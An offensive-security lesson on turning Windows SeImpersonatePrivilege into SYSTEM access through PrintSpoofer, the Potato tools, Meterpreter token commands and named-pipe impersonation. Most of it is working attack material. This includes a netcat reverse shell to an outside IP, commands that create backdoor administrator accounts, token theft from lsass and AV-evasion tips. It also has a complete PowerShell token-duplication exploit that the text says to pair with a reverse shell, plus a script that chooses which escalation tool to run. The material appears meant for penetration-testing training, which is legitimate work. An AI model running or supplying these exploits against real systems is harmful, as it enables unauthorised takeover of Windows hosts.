SeImpersonatePrivilege Exploitation

advanced · 35 min · Writeup

Various techniques to exploit SeImpersonatePrivilege

Learning Objectives

  • Check for SeImpersonate
  • Choose appropriate exploit
  • Execute token impersonation
  • Get SYSTEM shell

SeImpersonatePrivilege is arguably the most important privilege for Windows privilege escalation. When enabled, it allows a process to impersonate the security context of another user once that user (or service) has authenticated to it, typically by connecting to a named pipe or RPC endpoint the process controls. Combined with a way to make a SYSTEM service connect to such an endpoint, this nearly always leads to SYSTEM access.

This lesson focuses on the various ways to exploit SeImpersonatePrivilege beyond just the Potato family, including token manipulation, named pipe impersonation, and other techniques.

One Privilege = SYSTEM

If you see SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled in your whoami /priv output, you are almost certainly able to escalate to SYSTEM. The only question is which technique to use.

Checking for SeImpersonate

batch
REM Check current privileges
whoami /priv

REM Look for these two rows; the State column must read Enabled:
REM SeImpersonatePrivilege        Impersonate a client after authentication Enabled
REM SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled

REM Either of these = likely SYSTEM access!

REM Common accounts with SeImpersonate:
REM - IIS Application Pool accounts
REM - SQL Server service accounts
REM - LocalService
REM - NetworkService
REM - Service accounts in general (the SERVICE logon group holds it by default)

REM Check current user
whoami
REM Examples:
REM iis apppool\defaultapppool
REM nt authority\network service
REM nt service\mssqlserver

Web Shells and DB Access

If you have command execution through a web shell (IIS) or SQL injection (xp_cmdshell), you very likely have SeImpersonatePrivilege. This is the most common scenario for this privilege.

Exploitation Techniques

SeImpersonate Exploitation Methods:

Potato Attacks (most common):
├── PrintSpoofer - Win 10/2016/2019, requires the Print Spooler service to be running
├── JuicyPotato - Win 7-10 (pre-1809), Server 2008-2016
├── RoguePotato - Win 10 1809+, Server 2019; needs an attacker host redirecting port 135
├── SweetPotato - Multiple techniques combined in one binary
├── GodPotato - Newest, most compatible (Windows 8-11, Server 2012-2022)
└── See Potato Attacks lesson for details

Named Pipe Impersonation:
├── Create a named pipe server
├── Wait for a SYSTEM process to connect
├── Impersonate the connecting client
└── Get SYSTEM token

RogueWinRM:
├── Starts a fake WinRM listener on port 5985 and triggers BITS, which connects as SYSTEM
├── Works only when the real WinRM service is NOT listening (default on Windows 10, not on Server)
└── Useful when other methods fail

Token Manipulation (with Meterpreter):
├── incognito extension (list_tokens / impersonate_token)
├── steal_token - needs a handle to the target process, so it is a post-admin step, not a SeImpersonate technique
├── getsystem - its RPCSS and PrintSpooler named-pipe variants work with SeImpersonate alone
└── Automated token attacks

PrintSpoofer Deep Dive

batch
REM PrintSpoofer - most reliable for modern Windows

REM How it works:
REM 1. Creates a named pipe with a controlled name
REM 2. Calls the Print Spooler (spoolss) RPC interface with a crafted UNC path so the
REM    spooler service, running as SYSTEM, connects to that pipe
REM 3. Impersonates the SYSTEM connection
REM 4. Runs our command as SYSTEM

REM Requirements check:
whoami /priv | findstr SeImpersonate
REM Must be Enabled

sc query spooler | findstr STATE
REM Must be RUNNING

REM Usage variants:

REM Interactive shell (-i needs a console/RDP session; from a web shell use -c with a reverse shell)
PrintSpoofer64.exe -i -c cmd.exe

REM Run single command
PrintSpoofer64.exe -c "whoami"

REM Create new admin user
PrintSpoofer64.exe -c "net user pwned Password123! /add && net localgroup Administrators pwned /add"

REM Reverse shell
PrintSpoofer64.exe -c "C:\temp\nc64.exe -e cmd 10.10.14.5 4444"

REM Run PowerShell (interactive, so -i again)
PrintSpoofer64.exe -i -c "powershell -ep bypass"

Incognito Token Manipulation

Incognito - Token listing and impersonation

Originally a standalone tool, now integrated into Metasploit/Meterpreter

With a Meterpreter session:
─────────────────────────────
meterpreter > use incognito
meterpreter > list_tokens -u

Delegation Tokens Available
=============================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
CORP\Administrator

Impersonation Tokens Available
=============================
NT AUTHORITY\ANONYMOUS LOGON

(list_tokens only shows tokens in processes your user can open; from a plain
service account the list is often just your own, in which case a Potato-style
trigger is the reliable route.)

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"     (note the doubled backslash in the msf console)
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Standalone Incognito

batch
REM Incognito.exe (standalone version)

REM List available tokens
incognito.exe list_tokens -u

REM Execute command as another user
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

REM Add a domain user while impersonating a domain admin's token
incognito.exe execute -c "DOMAIN\Administrator" "net user hacker Password123! /add /domain"

Meterpreter Token Commands

Meterpreter Token Manipulation:

# Check current user
meterpreter > getuid

# Try automatic privilege escalation
meterpreter > getsystem
# Tries multiple techniques:
# - Named Pipe Impersonation (In Memory/Admin)      <- needs local admin
# - Named Pipe Impersonation (Dropper/Admin)        <- needs local admin
# - Token Duplication (In Memory/Admin)             <- needs local admin
# - Named Pipe Impersonation (RPCSS variant)        <- SeImpersonate is enough
# - Named Pipe Impersonation (PrintSpooler variant) <- SeImpersonate is enough

# If getsystem fails, try manual:

# Load incognito extension
meterpreter > use incognito

# List available tokens
meterpreter > list_tokens -u

# Impersonate specific token
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

# Steal token from specific process (needs a handle to that process: admin / SeDebugPrivilege)
meterpreter > steal_token <PID>

# Find SYSTEM process to steal from:
meterpreter > ps
# Look for: lsass.exe, winlogon.exe, services.exe

meterpreter > steal_token 512     # example PID of lsass

# Revert to original token
meterpreter > rev2self

Named Pipe Impersonation

powershell
# Named Pipe Impersonation concept
# Create a pipe → SYSTEM connects → we impersonate the connecting client

# This is what Potato attacks automate. The bare mechanism in PowerShell:

# PowerShell named pipe server
$PipeName = "evil_pipe"
$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,
    [System.IO.Pipes.PipeDirection]::InOut)

# Wait for a client to connect
$Pipe.WaitForConnection()

# Name of the connected client (identification only, no impersonation yet)
"Client: " + $Pipe.GetImpersonationUserName()

# Impersonate. RunAsClient calls ImpersonateNamedPipeClient on this thread,
# runs the script block, then reverts. Building a WindowsIdentity from the
# user name and calling Impersonate() does NOT work here: that path needs a
# logon token, not the pipe client's token.
# If RunAsClient throws Win32 error 1368, the client has not written to the
# pipe yet; read from the pipe first.
$Pipe.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
    # Now running as the connected user; if SYSTEM connected, we are SYSTEM
    [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
})

# Cleanup (RunAsClient has already reverted the thread to our own token)
$Pipe.Close()

Triggering SYSTEM Connection

The hard part is getting a SYSTEM process to connect to your pipe, and to connect at an impersonation level that allows more than identification. This is what Potato attacks solve: they use various tricks (Print Spooler, BITS, DCOM/COM activation) to trigger a SYSTEM connection.
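The following is an added example written for this edit, not code from the lesson or from any of the tools it names. It carries the named-pipe idea through to the step the tools perform after their trigger fires: impersonate the client, duplicate the impersonation token into a primary token, and start a process under it with CreateProcessWithTokenW, which itself requires SeImpersonatePrivilege in the caller (and the Secondary Logon service). The pipe name `demo_pipe`, the `Demo` P/Invoke wrapper and the spawned `cmd.exe /k whoami` are assumptions. Because no SYSTEM trigger is included, the script starts a child PowerShell that connects as your own user, so it runs end to end on any Windows host from a context that holds the privilege (an elevated prompt in a lab, a service account in the field); with a spooler/BITS/DCOM trigger as the client, the same code spawns a SYSTEM console.

```powershell
# Added example: pipe server -> impersonate client -> primary token -> new process.
# Assumptions: pipe name, command line and the Demo.* wrapper are made up for this demo.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
namespace Demo {
  [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
  public struct STARTUPINFO {
    public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
    public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
    public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
  }
  [StructLayout(LayoutKind.Sequential)]
  public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
  public static class Native {
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentThread();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenThreadToken(IntPtr thread, uint access, bool openAsSelf, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmdLine,
      uint creationFlags, IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
  }
}
"@

$PipeName = 'demo_pipe'   # assumption
$Server = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, [System.IO.Pipes.PipeDirection]::InOut)

# Stand-in for the SYSTEM trigger: a child powershell connects as OUR user, writes one byte
# and keeps the pipe open for a few seconds. A real attack replaces this with the
# spooler/BITS/DCOM trick from the Potato family.
$ClientCmd = "`$c = New-Object System.IO.Pipes.NamedPipeClientStream('.', '$PipeName', 'Out'); " +
             "`$c.Connect(5000); `$c.WriteByte(0x41); `$c.Flush(); Start-Sleep -Seconds 5; `$c.Dispose()"
$Encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($ClientCmd))
Start-Process -FilePath powershell.exe -ArgumentList "-NoProfile -EncodedCommand $Encoded" -WindowStyle Hidden

$Server.WaitForConnection()
$null = $Server.ReadByte()   # data must be read before impersonation, else Win32 error 1368
Write-Host "Client: $($Server.GetImpersonationUserName())"

$script:PrimaryToken = [IntPtr]::Zero
$Server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
    # This thread now carries the client's impersonation token. TOKEN_ALL_ACCESS = 0xF01FF.
    $hThreadToken = [IntPtr]::Zero
    if (-not [Demo.Native]::OpenThreadToken([Demo.Native]::GetCurrentThread(), 0xF01FF, $false, [ref]$hThreadToken)) {
        throw "OpenThreadToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # Impersonation token -> primary token (SecurityImpersonation = 2, TokenPrimary = 1)
    $hPrimary = [IntPtr]::Zero
    if (-not [Demo.Native]::DuplicateTokenEx($hThreadToken, 0xF01FF, [IntPtr]::Zero, 2, 1, [ref]$hPrimary)) {
        throw "DuplicateTokenEx failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $script:PrimaryToken = $hPrimary
    [Demo.Native]::CloseHandle($hThreadToken) | Out-Null
})
# RunAsClient has reverted this thread; we still hold the duplicated primary token.

$si = New-Object Demo.STARTUPINFO
$si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
$pi = New-Object Demo.PROCESS_INFORMATION
# LOGON_WITH_PROFILE = 1, CREATE_NEW_CONSOLE = 0x10. With a SYSTEM token the console prints nt authority\system.
$ok = [Demo.Native]::CreateProcessWithTokenW($script:PrimaryToken, 1, $null, 'C:\Windows\System32\cmd.exe /k whoami',
                                             0x10, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
if (-not $ok) { throw "CreateProcessWithTokenW failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
Write-Host "Spawned PID $($pi.dwProcessId) under the client's token"
[Demo.Native]::CloseHandle($script:PrimaryToken) | Out-Null
$Server.Dispose()
```

Save it as a `.ps1` (the `$script:` scope carries the token handle out of the impersonation callback). If the context also holds SeAssignPrimaryTokenPrivilege, CreateProcessAsUser works with the same primary token. From a web shell in session 0 there is no visible desktop, so replace `cmd.exe /k whoami` with a reverse shell, exactly as the PrintSpoofer `-c` examples do.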

Troubleshooting

Common Issues and Solutions:

PrintSpoofer fails:
├── Print Spooler not running → Try JuicyPotato/RoguePotato
├── SeImpersonate disabled → Check whoami /priv carefully
├── AV blocking → Try obfuscated version or alternate tool
└── Wrong architecture → Use 32/64 bit matching target

JuicyPotato fails:
├── Windows 10 1809+ → Use PrintSpoofer/RoguePotato
├── Wrong CLSID → Find working CLSID for your OS
├── Port in use → Change -l port number
└── COM blocked → Try different CLSID

RoguePotato fails:
├── No remote listener → Must set up socat redirect
├── Firewall blocking → Check port 135 access
└── Wrong setup → Verify socat command

General tips:
├── Always verify SeImpersonate is Enabled (not just present)
├── Check OS version to pick correct tool
├── Try multiple tools if first fails
└── Check AV logs for blocks

SeImpersonate Exploitation Flow

SeImpersonate to SYSTEM

1. Confirm: whoami /priv - verify SeImpersonate is Enabled
2. Check OS: systeminfo for Windows version and build
3. Check Spooler: sc query spooler for Print Spooler status
4. Choose Tool: PrintSpoofer → JuicyPotato → RoguePotato
5. Transfer: upload the chosen tool to the target
6. Execute: run with a reverse shell or command
7. Verify: whoami should show SYSTEM
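As an added example (not part of the original lesson), the following PowerShell script applies the check from "Checking for SeImpersonate" and steps 1-4 of the flow above as code: it parses `whoami /priv` text, reads the spooler state and OS build, and returns the tool order the lesson recommends (PrintSpoofer when the spooler runs, JuicyPotato below build 17763 which is 1809 / Server 2019, RoguePotato or GodPotato otherwise). The function names, the `Demo`-style parameters and the sample `whoami /priv` output at the bottom are constructed here; the decision inputs are explicit so it can be run offline against output captured from a web shell.

```powershell
# Added example: SeImpersonate triage helper. Function names and sample data are assumptions.

function Get-ImpersonationPrivs {
    # Parse `whoami /priv` output lines into @{ PrivilegeName = 'Enabled' | 'Disabled' }
    param([string[]]$PrivOutput)
    $state = @{}
    foreach ($line in $PrivOutput) {
        if ($line -match '^\s*(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $state[$Matches[1]] = $Matches[2]
        }
    }
    return $state
}

function Select-ImpersonationTool {
    # Decide which tool to try first, following the lesson's order.
    param(
        [hashtable]$Privs,
        [string]$SpoolerStatus,   # 'Running', 'Stopped', or '' when the service is absent
        [int]$Build               # OS build number; 17763 = Windows 10 1809 / Server 2019
    )
    $imp  = $Privs['SeImpersonatePrivilege']
    $assn = $Privs['SeAssignPrimaryTokenPrivilege']
    if (-not ($imp -or $assn)) {
        return [pscustomobject]@{ Applicable = $false; Note = 'No impersonation privilege in this token'; Order = @() }
    }
    $note = if ($imp -eq 'Enabled' -or $assn -eq 'Enabled') {
        'Privilege is Enabled'
    } else {
        # Present but Disabled: the token holds it, so a tool that enables it (AdjustTokenPrivileges) can still use it
        'Privilege present but Disabled; re-check with whoami /priv after the tool runs'
    }
    $order = New-Object System.Collections.Generic.List[string]
    if ($SpoolerStatus -eq 'Running') { $order.Add('PrintSpoofer') }
    if ($Build -lt 17763) {
        $order.Add('JuicyPotato')
    } else {
        $order.Add('RoguePotato (needs an attacker host redirecting port 135)')
        $order.Add('GodPotato')
    }
    return [pscustomobject]@{ Applicable = $true; Note = $note; Order = $order.ToArray() }
}

function Invoke-ImpersonationTriage {
    # Live version: gathers the three inputs from the current host.
    $privs   = Get-ImpersonationPrivs -PrivOutput (whoami /priv)
    $spooler = (Get-Service -Name Spooler -ErrorAction SilentlyContinue).Status
    $build   = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
    Select-ImpersonationTool -Privs $privs -SpoolerStatus "$spooler" -Build $build
}

# Constructed sample: an IIS app pool token on Server 2019 (build 17763) with the spooler stopped.
$Sample = @(
    'PRIVILEGES INFORMATION',
    '----------------------',
    '',
    'Privilege Name                Description                               State',
    '============================= ========================================= ========',
    'SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled',
    'SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled',
    'SeAuditPrivilege              Generate security audits                  Disabled',
    'SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled',
    'SeImpersonatePrivilege        Impersonate a client after authentication Enabled',
    'SeCreateGlobalPrivilege       Create global objects                     Enabled',
    'SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled'
)
$Decision = Select-ImpersonationTool -Privs (Get-ImpersonationPrivs $Sample) -SpoolerStatus 'Stopped' -Build 17763
$Decision | Format-List
```

On a live target run `Invoke-ImpersonationTriage`; with captured `whoami /priv` text from a web shell, feed it to `Get-ImpersonationPrivs` and supply the spooler state and build from `sc query spooler` and `systeminfo` by hand. The sample decision skips PrintSpoofer (spooler stopped) and, because the build is 1809-era, lists RoguePotato and GodPotato rather than JuicyPotato.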

Knowledge Check


Which accounts commonly have SeImpersonatePrivilege?

Challenges

SeImpersonate Escalation

Challenge · intermediate

You have a web shell running as IIS AppPool with SeImpersonatePrivilege. Escalate to SYSTEM using any available technique.


Key Takeaways

  • SeImpersonatePrivilege = near-guaranteed SYSTEM access
  • Service accounts (IIS, SQL) almost always have this privilege
  • PrintSpoofer is the first tool to try on modern Windows
  • Multiple Potato variants exist for different Windows versions
  • Meterpreter's getsystem automates many techniques
  • If one tool fails, try another - the privilege is exploitable